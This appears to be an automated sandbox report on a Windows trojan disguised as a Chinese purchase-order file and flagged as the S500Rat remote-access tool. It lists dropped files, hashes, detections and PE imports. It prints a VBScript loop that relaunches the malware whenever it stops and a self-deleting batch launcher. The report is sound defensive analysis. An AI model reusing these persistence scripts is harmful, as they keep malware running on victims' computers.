                                Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe"..fileset = """C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdmtquqg.mqe.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to2pisfa.knv.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\autB0AA.tmp

                                Download File
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29860
                                Entropy (8bit):7.371356646020825
                                Encrypted:false
                                SSDEEP:768:h7phOX3Fa3yodW5FuSDZsd2SASP470En5rX:5p4HiBcLZDZsdZtQL
                                MD5:00C2047099F1325C03B2949E9095EA14
                                SHA1:EA6B3809FD55AC5174A445DF75CFDC750D8C4461
                                SHA-256:5CFED55D7384F02858516285BF2561A1203A8560E73FF536BCC3F998FF34B7A4
                                SHA-512:C916F397012B24F5596E4D31B4C55FB70ED1EAB47C80F1CD8ECF2BF495CA64FE6FFBBF4BB288BFF814E77B5C700E7B73621B791F58720E506E525EDBA2D5DBC0
                                Malicious:false
                                Preview:EA06.........................Z..F@.~...!......'.!.@i...R.i....+}..a..,v.u..t.X...... ...J}NAm..,..l6.$.D.B...S 08.&....,k...@ap.\.....!....w..I.....P..1.............1...(.....D............,.....`.A@.z.......+..............!.u..x....M..(...v0 ........\.V8...@?.0.!..$.....P%.+-...R.V`..<`.o@.........`;.....`P.,.1R..1 .P.#..+......@..X4....K.....=....U....A%...z...."....U..C........F.......Q..D.? ..j......E..D.....F..@....Q..T.? ....(..;.o.....L....R.o..N.iE....T-...........r...#.~..M.@.u.VX...J4..&.,..H @...8 ...`...@.v.(....J4....2.*@.W..v1X...h.M..4...l..@.`...P... .....gT.......b......H.^.|.....0.^@..D....... ..Q6..$..[."...].,....594..(..... .]~... ".....}2.J5......X.......{......U.Q[......P;..Y.@.`.....6..@..*.%................O..U".L......H.+....*....=..@!.....*...q2....M*........{..m.@..V...W.h.A..C`R...1.._@.........f2.=....... .CR.@.F...,..c`.p..s...p.W. ...B....qV.X.P._.p.lO........{..e.k..S..J...o..!@..t.O.<e...@..~..-.....P(...........H0.I..\.5sk....G6.

                                C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):163
                                Entropy (8bit):5.060462211334656
                                Encrypted:false
                                SSDEEP:3:mKDDCMNqTtvL5o0nacwREaKC5QOHovmqRD0nacwRE2J5xAInTRI+QZPy:hWKqTtT6cNwiaZ5Qoovmq1cNwi23fTfT
                                MD5:1A02F8567AAD6EC592FC756BA574DEC3
                                SHA1:F09CAD97EDE501E87DCD5B7944CEF248706ED3D4
                                SHA-256:4295AF15D92E3270133D3CB4B18E0436B5E5F1A7457AFC75A86F39594D4AE73B
                                SHA-512:BDD2905A263AF003B431C89E5203F8700B114C8E6F859CD96A66E2ACAF895CF8F6AA6C25C388F0E29F0387C7DDDD057EE8FC1FAE1159631B2A61A98F71922AE2
                                Malicious:false
                                Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Stub\Chrome.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp1D8D.tmp.bat" /f /q..

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnk

                                Download File
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Oct 10 13:43:29 2022, mtime=Mon Oct 10 13:43:30 2022, atime=Mon Oct 10 13:43:30 2022, length=1382294, window=hide
                                Category:dropped
                                Size (bytes):1874
                                Entropy (8bit):3.50046165968657
                                Encrypted:false
                                SSDEEP:24:8Mpk2GL1b6y2mbesen/QCzDzyyAaVnDzkoE2+s9T4IlEDm:8Ma2Kb6yHDKZeahICr9MIlED
                                MD5:8F684E4EF58FCA16A20A720F701E0355
                                SHA1:FD909C87950AEC94F8DE9297E0250E811DD0CB1B
                                SHA-256:24D57F58580362B1224AAB68D03FF2C52BFF74D28CB2BD150DCE5B50A6DEE892
                                SHA-512:C7F8DA541C975C9540DEE8BFF5505C1120E1CDE64FEACF421DBC8FD236E66CE0F9B1C52248AEB8F01B674995270BAB7D017930ACD4AB8B54A3BFC01634ADF15F
                                Malicious:false
                                Preview:L..................F.@.. ..........._......._.................................:..DG..Yr?.D..U..k0.&...&......7...#-..................t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..JUiu.....Y.....................P/.A.p.p.D.a.t.a...B.V.1.....JUnu..Roaming.@.......N..JUnu.....Y.....................&>.R.o.a.m.i.n.g.....V.1.....JUnu..Windata.@......JUnuJUnu.....q....#................&>.W.i.n.d.a.t.a.....x.2.....JUpu .ACROBA~1.EXE..\......JUouJUpu.....W........................A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C...e.x.e.......o...............-.......n............,3I.....C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe..,.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..........................................

                                C:\Users\user\AppData\Roaming\Stub\Chrome.exe

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):5.624273190284013
                                Encrypted:false
                                SSDEEP:768:LcUAfpLYlYz/kv+Zrs47rbbaM8pevmJANvoizcc6Jg2vYjDGcfAgpv65D0Q:oUAfr/kmFfbaMruAEDnvY1fAAv6WQ
                                MD5:9B1C1C565D60ED67CB6E1986ACD95C3A
                                SHA1:29FCFCF6643FB10468D28B2DFE3743728C3D3F1C
                                SHA-256:AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                                SHA-512:B2D69E82539C877CB79441E132B9AD8E1424C5C2501017439834EA4BD5E7EF871ECFE43BF69B69E91C5B93B5C0773E25A016C2FE709ABB083B14248D49F42CDF
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 85%
                                • Antivirus: Virustotal, Detection: 79%, Browse
                                • Antivirus: Metadefender, Detection: 43%, Browse
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.b................................. ........@.. ....................... ............@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........R......................................................................../.\.....(....*b~....,.~....o..........*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*6.(1.........*2~.....o2...*6(r....Po....*6(r....Po....*J(....o......o....*..._*. ....(......... ....(...............*...o.....Z(....}......{.....X(....}......(....}....*^.{....(.....~....}....*2.{....(....*...{.....{ ......|!...{.....|!...{....(5...}....

                                C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe

                                Download File
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1382294
                                Entropy (8bit):7.25585974847377
                                Encrypted:false
                                SSDEEP:24576:kRmJkcoQricOIQxiZY1iau0Ar0WX1qr1wIWMXzFzkdS79w7BGO7:hJZoQrbTFZY1iaM7EC0zh1q0O7
                                MD5:D32389E2207879F0B57835EABCE6FB02
                                SHA1:23C2A0F0AC030766AE74B7FBFC242F3D77B0FF71
                                SHA-256:B3F2810E4BA5C3341498D99807E2F200459EB2BD4D365B3EE52A20E9E12606C1
                                SHA-512:8C9B9A881A941890DED45C19D9CEBD2BCC565347C31630E2ADC028CA9FE88555700E17E6F3DFDCB46CEC4F976E6DC6905341BAD9E1251FBA6F0774767DC969AD
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 73%
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......pG........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...pG.......H...T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                \Device\Null

                                Download File
                                Process:C:\Windows\System32\timeout.exe
                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.41440934524794
                                Encrypted:false
                                SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                MD5:3DD7DD37C304E70A7316FE43B69F421F
                                SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                Malicious:false
                                Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.25585974847377
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File size:1382294
                                MD5:d32389e2207879f0b57835eabce6fb02
                                SHA1:23c2a0f0ac030766ae74b7fbfc242f3d77b0ff71
                                SHA256:b3f2810e4ba5c3341498d99807e2f200459eb2bd4d365b3ee52a20e9e12606c1
                                SHA512:8c9b9a881a941890ded45c19d9cebd2bcc565347c31630e2adc028ca9fe88555700e17e6f3dfdcb46cec4f976e6dc6905341bad9e1251fba6f0774767dc969ad
                                SSDEEP:24576:kRmJkcoQricOIQxiZY1iau0Ar0WX1qr1wIWMXzFzkdS79w7BGO7:hJZoQrbTFZY1iaM7EC0zh1q0O7
                                TLSH:EE55B011B9818426C2F322B19F79F7B275295D36332691B727F83E277AB0C436B15722
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                File Icon

                                Icon Hash:b2b292b2e298ac92

                                Static PE Info

                                General

                                Entrypoint:0x4165c1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                Entrypoint Preview

                                Instruction
                                call 00007F7FBCB83C2Bh
                                jmp 00007F7FBCB7AA9Eh
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push edi
                                push esi
                                mov esi, dword ptr [ebp+0Ch]
                                mov ecx, dword ptr [ebp+10h]
                                mov edi, dword ptr [ebp+08h]
                                mov eax, ecx
                                mov edx, ecx
                                add eax, esi
                                cmp edi, esi
                                jbe 00007F7FBCB7AC1Ah
                                cmp edi, eax
                                jc 00007F7FBCB7ADB6h
                                cmp ecx, 00000080h
                                jc 00007F7FBCB7AC2Eh
                                cmp dword ptr [004A9724h], 00000000h
                                je 00007F7FBCB7AC25h
                                push edi
                                push esi
                                and edi, 0Fh
                                and esi, 0Fh
                                cmp edi, esi
                                pop esi
                                pop edi
                                jne 00007F7FBCB7AC17h
                                jmp 00007F7FBCB7AFF2h
                                test edi, 00000003h
                                jne 00007F7FBCB7AC26h
                                shr ecx, 02h
                                and edx, 03h
                                cmp ecx, 08h
                                jc 00007F7FBCB7AC3Bh
                                rep movsd
                                jmp dword ptr [00416740h+edx*4]
                                mov eax, edi
                                mov edx, 00000003h
                                sub ecx, 04h
                                jc 00007F7FBCB7AC1Eh
                                and eax, 03h
                                add ecx, eax
                                jmp dword ptr [00416654h+eax*4]
                                jmp dword ptr [00416750h+ecx*4]
                                nop
                                jmp dword ptr [004166D4h+ecx*4]
                                nop
                                inc cx
                                add byte ptr [eax-4BFFBE9Ah], dl
                                inc cx
                                add byte ptr [ebx], ah
                                ror dword ptr [edx-75F877FAh], 1
                                inc esi
                                add dword ptr [eax+468A0147h], ecx
                                add al, cl
                                jmp 00007F7FBEFF3417h
                                add esi, 03h
                                add edi, 03h
                                cmp ecx, 08h
                                jc 00007F7FBCB7ABDEh
                                rep movsd
                                jmp dword ptr [00000000h+edx*4]

                                Rich Headers

                                Programming Language:
                                • [ C ] VS2010 SP1 build 40219
                                • [C++] VS2010 SP1 build 40219
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [ASM] VS2010 SP1 build 40219
                                • [RES] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x34770.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x8061c0x80800False0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x820000xdfc00xe000False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x900000x1a7580x6800False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0xab0000x347700x34800False0.2576078869047619data5.30911705403333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain
                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain
                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain
                                RT_ICON0xab9400x400ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain
                                RT_ICON0xaf9500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain
                                RT_ICON0xc01780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain
                                RT_ICON0xc96200x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishGreat Britain
                                RT_ICON0xcfe080x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain
                                RT_ICON0xd52900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain
                                RT_ICON0xd94b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain
                                RT_ICON0xdba600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain
                                RT_ICON0xdcb080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain
                                RT_MENU0xdcf700x50dataEnglishGreat Britain
                                RT_DIALOG0xdcfc00xfcdataEnglishGreat Britain
                                RT_STRING0xdd0c00x530dataEnglishGreat Britain
                                RT_STRING0xdd5f00x690dataEnglishGreat Britain
                                RT_STRING0xddc800x4d0dataEnglishGreat Britain
                                RT_STRING0xde1500x5fcdataEnglishGreat Britain
                                RT_STRING0xde7500x65cdataEnglishGreat Britain
                                RT_STRING0xdedb00x388dataEnglishGreat Britain
                                RT_STRING0xdf1380x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States
                                RT_GROUP_ICON0xdf2900x84dataEnglishGreat Britain
                                RT_GROUP_ICON0xdf3180x14dataEnglishGreat Britain
                                RT_GROUP_ICON0xdf3300x14dataEnglishGreat Britain
                                RT_GROUP_ICON0xdf3480x14dataEnglishGreat Britain
                                RT_VERSION0xdf3600x19cdataEnglishGreat Britain
                                RT_MANIFEST0xdf5000x26cASCII text, with CRLF line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
